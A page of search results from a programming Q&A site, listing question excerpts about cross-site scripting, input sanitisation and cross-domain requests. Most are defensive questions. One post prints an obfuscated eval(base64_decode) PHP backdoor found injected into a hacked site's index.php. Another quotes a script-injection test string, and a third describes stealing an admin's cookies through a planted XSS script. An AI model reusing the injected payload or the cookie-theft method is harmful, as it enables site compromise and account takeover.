Search Results

Search found 236 results on 10 pages for 'xss'.

Page 3/10 | < Previous Page | 1 2 3 4 5 6 7 8 9 10 | Next Page >

XSS to change ASP.NET session state

- by Juri Bogdanov

Hello! I am developing the application that stores current user and user's role to session state (System.Web.SessionState.HttpSessionState Page.Session). if (Session["username"] == null) Session.Add("username", User.Identity.Name); if (Session["isAdministrator"] == null) Session.Add("isAdministrator", User.IsInRole(domain + "\\Domain Admins")); After I check these session states in code behind for granting permissions to some excecution: if ((bool)Session["isAdministrator"] || computer.Administrators.Contains(Session["username"].ToString())) My question is next: how safe that mechanism is? Is it possible to change the session states using some JavaScript for example or some how else? Thanks :)

Read the article
Is it necessary to "escape" character "<" and ">" for javascript string?

- by Morgan Cheng

Sometimes, server side will generate strings to be embedded in inline JavaScript code. For example, if "UserName" should be generated by ASP.NET. Then it looks like. <script> var username = "<%UserName%>"; </script> This is not safe, because a user can have his/her name to be </script><script>alert('bug')</script></script> It is XSS vulnerability. So, basically, the code should be: <script> var username = "<% JavascriptEncode(UserName)%>"; </script> What JavascriptEncode does is to add charater "\" before "/" and "'" and """. So, the output html is like. var username = "<\/scriptalert(\'bug\')<\/script<\/script"; Browser will not interpret "<\/script" as end of script block. So, XSS in avoided. However, there are still "<" and "" there. It is suggested to escape these two characters as well. First of all, I don't believe it is a good idea to change "<" to "<" and "" to ">" here. And, I'm not sure changing "<" to "\<" and "" to "\" is recognizable to all browsers. It seems it is not necessary to do further encoding for "<" and "". Is there any suggestion on this? Thanks.

Read the article
Any danger in calling flash messages html_safe?

- by PreciousBodilyFluids

I want a flash message that looks something like: "That confirmation link is invalid or expired. Click here to have a new one generated." Where "click here" is of course a link to another action in the app where a new confirmation link can be generated. Two drawbacks: One, since link_to isn't defined in the controller where the flash message is being set, I have to put the link html in myself. No big deal, but kind of messy. Number two: In order for the link to actually display properly on the page I have to html_safe the flash display function in the view, so now it looks like (using Haml): - flash.each do |name, message| = content_tag :div, message.html_safe This gives me pause. Everything else I html_safe has been HTML I've written myself in helpers and whatnot, but the contents of the flash hash are stored in a cookie client-side, and could conceivably be changed. I've thought through it, and I don't see how this could result in an XSS attack, but XSS isn't something I have a great understanding of anyway. So, two questions: 1. Is there any danger in always html_safe-ing all flash contents like this? 2. The fact that this solution is so messy (breaking MVC by using HTML in the controller, always html_safe-ing all flash contents) make me think I'm going about this wrong. Is there a more elegant, Rails-ish way to do this? I'm using Rails 3.0.0.beta3.

Read the article
How best to present a security vulnerability to a web development team in your own company?

- by BigCoEmployee

Imagine the following scenario: You work at Big Co. and your coworkers down the hall are on the web development team for Big Co's public blog system, which a lot of Big Co employees and some public people use. The blog system allows any HTML and JavaScript, and you've been told that it was a choice (not by accident) but you aren't sure if they realize the implications of this. So you want to convince them that this is a bad idea. You write some demonstration code and plant a XSS script in your own blog, and then write some blog posts. Soon after, the head blog admin (down the hall) visits your blog post and the XSS sends his cookies to you. You copy them into your browser and you are now logged in as him. Okay, now you're logged in as him... And you start realizing that it maybe wasn't such a good idea to go ahead and 'hack' the blog system. But you are a good guy! You don't touch his account after logging into it, and you definitely don't plan on publicizing this weakness; you just maybe want to show them that the public is able to do this, so that they can fix it before someone malicious realizes the same thing! What is the best course of action from here?

Read the article
Why use a whitelist for HTML sanitizing?

- by Carson Myers

I've often wondered -- why use a whitelist as opposed to a blacklist when sanitizing HTML input? How many sneaky HTML tricks are there to open XSS vulnerabilities? Obviously script tags and frames are not allowed, and a whitelist would be used on the fields in HTML elements, but why disallow most of everything?

Read the article
Sanitizing input for display in view when using simple_format

- by Eric

Hi, I'm trying to figure out the right way to display comments such that newlines and links are displayed. I know that usually, you should display user-inputs only when escaping html with h(). That of course won't display newlines or links, so I found the simple_format and auto_link methods. What I am now doing is: simple_format(santize(auto_link(comment.text))) Is this the right way to do this, and is it still safe from XSS attacks? Thanks! Eric

Read the article
To HTMLENCODE or not to HTMLENCODE user input on web form (asp.net vb)

- by Phil

I have many params making up an insert form for example: x.Parameters.AddWithValue("@city", City.Text) I had a failed xss attack on the site this morning, so I am trying to beef up security measures anyway.... Should I be adding my input params like this? x.Parameters.AddWithValue("@city", HttpUtility.HtmlEncode(City.Text)) Is there anything else I should consider to avoid attacks? Thanks

Read the article
I think my PHP app is being session hijacked?

- by Mark Sandman

Hi there, I have a php site that lets registered users login (with a valid passord) and sets up a session based on their UserID. However I'm pretty sure thisis being hijacked and I've found "new" files on my server I didn't put there. My site cleans all user input for SQL injections and XSS but this keeps happening. Has anyone got any ideas on how to solve this?

Read the article
Encoding PHP Tags for Security?

- by Abi Noda

Kohana and Codeigniter both have encode_php_tags(). I understand XSS cleaning (for Javascript), but when and why would you use encode_php_tags()? What is the security threat?

Read the article
What's the best, Escape then store Or store then escape the output?

- by Axel

Hi, After doing a long search on stackoverflow i didn't find any one talked about this even if it's a big choice, the Question is what's the best in order to prevent both of XSS and SQL injection, Escaping the data then store it in the DB or Store it as it is and escape when output it? Note: it is better if you give some examples of practics if possible. Thanks

Read the article
Sanitising user input using Python

- by Steve

What's the best way to sanitise user input for a Python-based web application? Is there a single function to remove HTML characters and any other necessary characters combinations to ensure that an XSS or SQL injection attack isn't possible?

Read the article
Cross site scripting help?

- by shane87

I have a piece of javascript executing on a jetty server which is sending a XMLHTTPRequest to a scoket on another server(wamp server). The request gets sent to the socket, however the XHR response seems to be getting blocked. My only thoughts on this is it may be an issue with XSS(cross site scripting). Is there a way in which i could enable cross site scripting for this particular request or is there something else i should be doing? Any help would be greatly appreciated!

Read the article
What's the best method for sanitizing user input with PHP?

- by UltimateBrent

Is there a catchall function somewhere that works well for sanitizing user input for sql injection and XSS attacks, while still allowing certain types of html tags?

Read the article
How to allow my Asp.net MVC 3 web app using MathJax to accept user input $x<y>z$ ?

- by Recycle Bin

I am developing a mathematics site using Asp.Net MVC 3 + Razor + MathJax. MathJax is a javascript library to render TeX or LaTeX codes on the web browser. And TeX or LaTeX codes represent mathematics contents such as an inline math $y=mx+c$ and a displayed math \[y=mx+c\]. Right now my site can accept input, for example, $x<y$. However it cannot accept $x<y>z$ because the framework regards this input is vulnerable to XSS and XSRF. Shortly speaking, what I should do to accomplish what I want but it does not open security vulnerability.

Read the article
Are these two functions overkill for sanitization?

- by jpjp

function sanitizeString($var) { $var = stripslashes($var); $var = htmlentities($var); $var = strip_tags($var); return $var; } function sanitizeMySQL($var) { $var = mysql_real_escape_string($var); $var = sanitizeString($var); return $var; } I got these two functions from a book and the author says that by using these two, I can be extra safe against XSS(the first function) and sql injections(2nd func). Are all those necessary? Also for sanitizing, I use prepared statements to prevent sql injections. I would use it like this: $variable = sanitizeString($_POST['user_input']); $variable = sanitizeMySQL($_POST['user_input']);

Read the article
Best practice. Do I save html tags in DB or store the html entity value?

- by Matt

Hi Guys, I was wondering about which way i should do the following. I am using the tiny MCE wysiwyg editor which formats the users data with the right html tags. Now, i need to save this data entered into the editor into a database table. Should I encode the html tags to their corresponding entities when inserting into the DB, then when i get the data back from the table, not have the encode it for XSS purposes but I'd still have to use eval for the html tags to format the text. OR Do i save the html tags into the database, then when i get the data back from the database encode the html tags to their entities, but then as the tags will appear to the user, I'd have to use the eval function to actually format the data as it was entered. My thoughts are with the first option, I just wondered on what you guys thought.

Read the article
PHP: best practice. Do i save html tags in DB or store the html entity value?

- by Matt

Hi Guys, I was wondering about which way i should do the following. I am using the tiny MCE wysiwyg editor which formats the users data with the right html tags. Now, i need to save this data entered into the editor into a database table. Should i encode the html tags to their corresponding entities when inserting into the DB, then when i get the data back from the table, not have the encode it for XSS purposes but i'd still have to use eval for the html tags to format the text. OR Do i save the html tags into the database, then when i get the data back from the database encode the html tags to their entities, but then as the tags will appear to the user, i'd have to use the eval function to actually format the data as it was entered. My thoughts are with the first option, i just wondered on what you guys thought. Thanks M

Read the article
Duplicate ID/indexes and looping

- by Justin Alexander

I realize having two elements in the same html doc with the same ID is wrong, bad, immoral, and will lead to global warming. But... I'm trying to write an XSS widgit, so I really have no control over the quality of the parent web page. I loop through document.images to retrieve a list of images on the page. I perform an action on each one. for(img in document.images){ ... } i've also tried for(var i=0;i<document.images.length;i++){ ... } in both cases it allows me to loop through all of the elements, BUT when trying trying to reference an object with a duplicate ID, I always get the first (in order of the html). When using debugger in IE8 i'm able to see that both elements ARE listed, but that they both have the same index (in IE the index of the document.images is either sequential or matches the image ID) Does anyone have a better solution?

Read the article
Using user editable image URL in application. Security issues.

- by sharas

Hi there. I am writing an application where users are required to show their photo, however as my server resources are very limited I can not let them upload it to the server. So I have three major questions: 1. How to properly validate photo URL? At least I can validate with regexp, however I need to check for file ending: `validates_format_of :photo_url, :with => URI::regexp(%w(http https))` 2. Security issues? XSS? Even I validate the picture at the moment of creation, hacker can replace image with malicious stuff anytime. 3. Maybe there are free asset stores with API?

Read the article
PHP: I got hacked...

- by jun

I just checked my site it suddenly jumps me to this site: xxxp://www1.re*******3.net/?p=p52dcWpkbG6HjsbIo216h3de0KCfaFbVoKDb2YmHWJjOxaCbkXp%2FWqyopHaYXsiaY2eRaGNpnFPVpJHaotahiaJ0WKrO1c%2Beb1qfnaSZdV%2FXlsndblaWpG9plmGQYWCcW5eakWppWKjKx6ChpqipbmdjpKjEjtDOoKOhY56n1pLWn1%2FZodXN02BdpqmikpVwZWpxZGxpcV%2FVoJajYmJkZ2hwlGGXaVbJkKC0q1eum5qimZxx I found out that in the first line of my index.php file, that looks like this: <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHR/* Snip */DkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?> How do I stop this? thanks! UPDATE: What kind of attack is this? is this really xss? No one really knows about my ftp password.

Read the article
How to reliably send a request cross domain and cross browser on page unload

- by Agmin

I have javascript code that's loaded by 3rd parties. The javascript keeps track of a number of metrics, and when a user exits the page I'd like to send the metrics back to my server. Due to XSS checks in some browsers, like IE, I cannot do a simple jquery.ajax() call. Instead, I'm appending an image src to the page with jquery. Here's the code, cased by browser: function record_metrics() { //Arbitrary code execution here to set test_url $esajquery('#MainDiv').append("<img src='" + test_url + "' />"); } if ($esajquery.browser.msie) { window.onbeforeunload = function() { record_metrics(); } } else { $esajquery(window).unload( function(){ record_metrics(); } ); } FF aborts the request to "test_url" if I use window.onbeforeunload, and IE8 doesn't work with jquery's unload(). IE8 also fails to work if the arbitrary test_url setting code is too long, although IE8 seems to work fine if the is immediately appended to the DOM. Is there a better way to solve this issue? Unfortunately this really needs to execute when a user leaves the page.

Read the article
Approaches for cross server content sharing?

- by Anonymity

I've currently been tasked with finding a best solution to serving up content on our new site from another one of our other sites. Several approaches suggested to me, that I've looked into include using SharePoint's Lists Web Service to grab the list through javascript - which results in XSS and is not an option. Another suggestion was to build a server side custom web service and use SharePoint Request Forms to get the information - this is something I've only very briefly looked at. It's been suggested that I try permitting the requesting site in the HTTP headers of the serving site since I have access to both. This ultimately resulted in a semi-working solution that had major security holes. (I had to include username/password in the request to appease AD Authentication). This was done by allowing Access-Control-Allow-Origin: * The most direct approach I could think of was to simply build in the webpart in our new environment to have the authors manually update this content the same as they would on the other site. Are any one of the suggestions here more valid than another? Which would be the best approach? Are there other suggestions I may be overlooking? I'm also not sure if WebCrawling or Content Scrapping really holds water here...

Read the article
Sanitizing user input before adding it to the DOM in Javascript

- by I GIVE TERRIBLE ADVICE

I'm writing the JS for a chat application I'm working on in my free time, and I need to have HTML identifiers that change according to user submitted data. This is usually something conceptually shaky enough that I would not even attempt it, but I don't see myself having much of a choice this time. What I need to do then is to escape the HTML id to make sure it won't allow for XSS or breaking HTML. Here's the code: var user_id = escape(id) var txt = '<div class="chut">'+ '<div class="log" id="chut_'+user_id+'"></div>'+ '<textarea id="chut_'+user_id+'_msg"></textarea>'+ '<label for="chut_'+user_id+'_to">To:</label>'+ '<input type="text" id="chut_'+user_id+'_to" value='+user_id+' readonly="readonly" />'+ '<input type="submit" id="chut_'+user_id+'_send" value="Message"/>'+ '</div>'; What would be the best way to escape id to avoid any kind of problem mentioned above? As you can see, right now I'm using the built-in escape() function, but I'm not sure of how good this is supposed to be compared to other alternatives. I'm mostly used to sanitizing input before it goes in a text node, not an id itself.

Read the article
Sanitizing usser input before adding it to the DOM in Javascript

- by I GIVE TERRIBLE ADVICE

I'm writing the JS for a chat appication I'm working on in my free time, and I need to have HTML identifiers that change according to user submitted data. This is usually something conceptually shaky enough that I would not even attempt it, but I don't see myself having much of a choice this time. What I need to do then is to escape the HTML id to make sure it won't allow for XSS or breaking HTML. Here's the code: var user_id = escape(id) var txt = '<div class="chut">'+ '<div class="log" id="chut_'+user_id+'"></div>'+ '<textarea id="chut_'+user_id+'_msg"></textarea>'+ '<label for="chut_'+user_id+'_to">To:</label>'+ '<input type="text" id="chut_'+user_id+'_to" value='+user_id+' readonly="readonly" />'+ '<input type="submit" id="chut_'+user_id+'_send" value="Message"/>'+ '</div>'; What would be the best way to escape id to avoid any kind of problem mentioned above? As you can see, right now I'm using the built-in escape() function, but I'm not sure of how good this is supposed to be compared to other alternatives. I'm mostly used to sanitizing input before it goes in a text node, not an id itself.

Read the article
use jsonp to get xml cross domain

- by lmkk

I am trying to read xml into a webpage from another server, and I assume that my problem is Same-Origin Policy, and therefore a cross domain problem. I have a bit of googling and it seems that jsonp is the way forward. Based on some examples I found here on stackoverflow and another sites, this is what I have, and it does not "hit" the server with the xml. I can view the xml in a browser. $(document).ready(function(){ $.ajax({ type: 'GET', dataType: 'jsonp', url: 'http://192.168.0.106:8111/getconfiguration?', success: function (xml) { //do stuff with received xml }}); Any suggestions? please keep in mind that I am a newbie with regards to JS / JQuery ;o)

Read the article

< Previous Page | 1 2 3 4 5 6 7 8 9 10 | Next Page >